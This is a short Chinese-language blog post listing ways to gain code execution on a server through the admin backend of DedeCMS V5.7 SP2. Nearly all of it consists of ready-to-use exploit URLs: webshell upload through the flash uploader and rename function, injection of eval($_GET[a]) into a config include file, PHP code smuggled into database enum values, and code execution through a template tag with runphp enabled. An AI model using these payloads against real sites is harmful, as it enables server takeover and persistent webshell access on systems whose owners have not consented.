DedeCMS V5.7 SP2后台漏洞小集合

记录一下最新版dedecms后台拿服务器的几个方式。

01、上传shell

1、后台上传flash文件处未对文件内容作校验,可直接上传shell。
2、通过重命名功能:

1
http://localhost/dede/file_manage_control.php?fmdo=rename&oldfilename=/uploads/media/xxx/xxxx.swf&newfilename=/sunu11.php

02、写入配置
/dede/sys_verifies.php中可写进恶意代码至inc文件

1
1、http://localhost/dedecms/uploads/dede/sys_verifies.php?action=getfiles&refiles[0]=123&refiles[1]=\%22;eval($_GET[a]);die();//
1
2、http://localhost/dedecms/uploads/dede/sys_verifies.php?action=down&a=phpinfo();

03、数据库写入数据未过滤:

1
http://localhost/dedecms/uploads/dede/stepselect_main.php?action=addenum_save&ename=xxx&egroup=;phpinfo();$&issign=1

查询:

1
2
3
http://localhost/dedecms/uploads/dede/sys_cache_up.php?step=2&egroup=a=1;phpinfo();&dopost=ok
or:
http://localhost/data/enums/;phpinfo();$.php

05、模板问题:

1
http://localhost/dede/tag_test_action.php?url=a&token=xxxxx&partcode={dede:mochazz name='source' runphp='yes'}phpinfo();{/dede:mochazz}

-------------本文结束感谢您的阅读-------------
  • Post author: SuNu11
  • Post link: http://sunu11.com/2018/04/03/19/
  • Copyright Notice: All articles in this blog are licensed under BY-NC-SA unless stating additionally.